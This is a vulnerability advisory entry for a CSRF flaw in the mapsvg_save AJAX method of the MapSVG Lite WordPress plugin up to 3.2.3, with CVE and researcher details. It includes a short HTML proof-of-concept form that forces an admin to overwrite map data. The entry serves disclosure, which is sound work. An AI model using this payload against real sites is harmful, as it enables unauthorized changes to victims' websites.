MapSVG Lite <= 3.2.3 - Cross-Site Request Forgery (CSRF)



Description
CSRF in the mapsvg_save() AJAX method
Proof of Concept
<form method="POST" action="http://localhost:8080/wp-admin/admin-ajax.php?action=mapsvg_save">
 <input type="text" name="data[title]" value="A bad value">
 <input type="text" name="data[mapsvg_data]" value="">
 <input type="text" name="data[map_id]" value="2">
 <input type="submit">
</form>

Affects Plugin

fixed in version 3.3.0
- plugin closed

References

CVE 2019-1000003
URL https://advisories.dxw.com/advisories/csrf-mapsvg-lite/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Rob Skilling (dxw)
Submitter Ryan Dewhurst
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 10676
Verified No
WPVDB ID 9198

Timeline

Publicly Published 2019-01-08 (over 1 year ago)
Added 2019-01-08 (over 1 year ago)
Last Updated 2019-12-02 (6 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin